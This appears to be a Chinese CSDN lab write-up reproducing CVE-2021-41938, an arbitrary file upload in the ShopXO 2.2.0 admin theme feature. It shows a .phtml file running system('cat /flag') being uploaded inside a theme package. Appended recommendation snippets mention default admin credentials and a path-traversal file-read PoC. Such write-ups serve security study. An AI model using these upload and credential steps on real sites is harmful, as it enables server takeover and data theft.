【春秋云镜】CVE-2021-41938-ShopXO CMS 2.2.0. 后台管理页面存在任意文件上传漏洞

最新推荐文章于 2024-06-14 09:22:46 发布
最新推荐文章于 2024-06-14 09:22:46 发布
阅读量379 收藏 3
点赞数 9
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HMX404/article/details/135918726
版权

ShopXO CMS 2.2.0. 后台管理页面存在任意文件上传漏洞

主题下载

主题下载

新建PHTML文件放入此目录下
default -> static

在这里插入图片描述

文件内容:

<?php
system('cat /flag');
echo 1234; 
?>

上传到主题

图片无法加载,请检查网络。
在这里插入图片描述

访问成功
在这里插入图片描述
值得注意的是,使用修改为PHP文件,无法执行,只有phtml可以执行,大家可以试试还有什么后缀可以用。

反正我是脚本小子,我也不知道原理。
如果对你有用的话,关注就不要取消了!!!

HMX404
关注
  • 9
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现】ShopXO任意文件读取漏洞
晚风不及你
03-04 1210
ShopXO是一套开源的企业级开源电子商务系统,包含PC、H5、微信小程序、支付宝小程序、百度小程序等多个终端,遵循Apache2开源协议发布,基于ThinkPHP5.1框架研发。该系统具有求实进取、创新专注、自主研发、国内领先企业级B2C电商系统解决方案等特点,可满足99%的电商运营需求。
ShopXO商城系统文件上传0Day代审历程
weixin_43526443的博客
09-05 2056
这两天攻防中,某政局内网横向发现多网段服务器,该服务器搭建了ShopXO商城系统(后来发现是开发临时搭建的,准备做二开用的)。结果花了30来秒审了个垃圾Day拿下该服务器,本文就是给新手提供思路(没交cnvd,懒)
phpcms v9.任意文件上传漏洞复现
newlife1441的博客
08-15 4549
如果你也出现上面的情况请试试下面说的方法:这里有一个小坑注意,你在压缩前面的文件时要注意他们在压缩文件中的顺序,意思就是你创建的一个php文件在创建的txt文件的上面就可以成功,只有这样在解压失败后它还是能够保留并将php文件成功解压出来。时间竞争漏洞利用原理其实就是在解压文件后与删除限制的文件之间的时间空隙来利用提前在限制的文件中写好的利用代码在非解压目录下生成新的不会被删除的新文件(木马),通过这个木马来拿下网站。原理:这里我们通过利用解压文件在解压过程出错会导致后面的递归删除操作不会执行的特点。...
[GKCTF2020]老八小超市儿
wuyaowangchuan的博客
11-14 281
地址:https://buuoj.cn/challenges#[GKCTF2020]%E8%80%81%E5%85%AB%E5%B0%8F%E8%B6%85%E5%B8%82%E5%84%BF 进入环境 可以看出由ShopXO CMS搭建的 这道题是基于已有的漏洞 ShopXO 安全漏洞 shopxo的默认后台就是admin.php, 登入的默认账号密码是admin和shopxo 进去后台 打开应用中心的应用商店的主题 先下载一个主题 在这个位置添加一个木马 然后再上传 加个phpinfo(
2021-02-24
m0_53314778的博客
02-24 447
[GKCTF2020]老八小超市儿 知识点 shopxo后台全版本获取shell 搜索能力 渗透测试|shopxo后台全版本获取shell复现 启动靶机: 一看就知道是个CMS,我们试着搜索一下ShopXO企业级免费开源商城系统的漏洞,可以知道一个后台文件上传漏洞 知道了默认后台地址以及账号和密码:/admin.php | admin:shopxo 成功进入后台 左侧找到安装主题功能,然后到shopxo官网下载一个官方的主题模板,摸了一下主题模板的结构后发现可以把马插在压缩包的/主题名/_stati
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
需要测试vCenter 6.5 Linux(VCSA)/窗口等待测试vCenter 6.7 Linux(VCSA)/窗口等待测试vCenter 7.0 Linux(VCSA)/窗口等待测试细节突破为任意文件上传存在问题的接口为/ui/vropspluginui/rest/services/...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
渗透测试|shopXO后台全版本获取Shell复现
qq_45521281的博客
05-29 5563
shopxo是一款开源的企业级商城系统,基于thinkphp5框架开发。这几天做了“[GKCTF2020]老八小超市儿”这道题,学到了后台获取shell的一个技巧,所以在这里复现一下。 提供一个搜索语法:title=“ShopXO企业级B2C电商系统提供商”(不要干坏事哦) 渗透测试复现 页面来自buuctf——[GKCTF2020]老八小超市儿。ShopXO全版本getshell流程走起: 进入题目(网上随便可以通过搜索找到一个使用shopxo搭建的演示站) 别的漏洞没找到,尝试访问默认登陆后台后台
BUUCTF 35
qq_52431855的博客
03-02 421
知识点 ShopXO企业级免费开源商城系统的漏洞(参考链接) SSTI模板注入 模板注入的一些特性(常见的注入可以用下图的方法进行测试。) 35-1[GKCTF2020]老八小超市儿 做题思路 开始毫无头绪,寻找WP,发现利用shopxo已有的漏洞, 利用方法链接 http://www.nctry.com/1660.html 默认后台admin.php默认账号密码是admin和shopxo 成功进入后台 接下来就在应用中心里的应用商店找到主题,然后下载默认..
shopxo代码审计
weixin_30412013的博客
06-12 1439
由于工作原因,分析了很多的cms也都写过文章,不过觉得好像没什么骚操作都是网上的基本操作,所以也就没发表在网站上,都保存在本地。最近突然发现自己博客中实战的东西太少了,决定将以前写的一些文章搬过来,由于当时写的初4是给自己留个记录,以后方便查看,所以写的都很简单,只有代码审计和复现,没有详细写挖掘中遇到的一些坑。以后写的文章中会尽量写详细的 ---------------------------...
shopxo 文件读取(CNVD-2021-15822)
热门推荐
小小猪的博客
12-29 1万+
shopxo 文件读取(CNVD-2021-15822) 漏洞介绍: ShopXO是一套开源的企业级开源电子商务系统。 ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息 影响范围: ShopXO版本 环境搭建: 在线环境 地址 漏洞复现: 访问首页 进行burp抓包 将要访问的文件进行编码 构造poc GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1...
ShopXO 开发文档
草巾冒小子的博客
03-15 1171
ShopXO商城使用手册及超实用开发文档【收费¥22】 --> 详细【部分免费】
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 268
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程中至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
源码编译安装LAMP
潇的博客
06-12 831
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
无回显XXE攻击:隐秘的数据泄露技术
最新发布
weixin_43822401的博客
06-14 370
无回显XXE攻击是一种隐蔽的数据泄露手段,攻击者可以在不引起目标服务器注意的情况下获取敏感信息。了解这种攻击的原理和防御策略对于保护网络安全至关重要。通过本文的介绍,希望读者能够提高对无回显XXE攻击的认识,并采取相应的防护措施。
软考初级网络管理员_07_网络单选题
2301_80961833的博客
06-12 908
部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了169.254.0.0范围内的地址。部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了127.254.0.0范围内的地址。通过ARP协议可以获取目的端的MAC地址和UUID的地址。你必须先接入Internet,别人才可以给你发送电子邮件。只要你的E-Mai 地址有效,别人就可以给你发送电子邮件。你只有打开了自己的计算机,别人才可以给你发送电子邮件。关于虚拟局域网,下面的描述中错误的是()。
春秋云镜CVE-2022-30887
09-05
春秋云镜CVE-2022-30887是指Pharmacy Management System文件上传漏洞,该漏洞CVE编号为CVE-2022-30887。此漏洞可能允许攻击者通过上传恶意文件利用系统中的漏洞。请注意,由于未提供更多信息,我无法提供详细的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值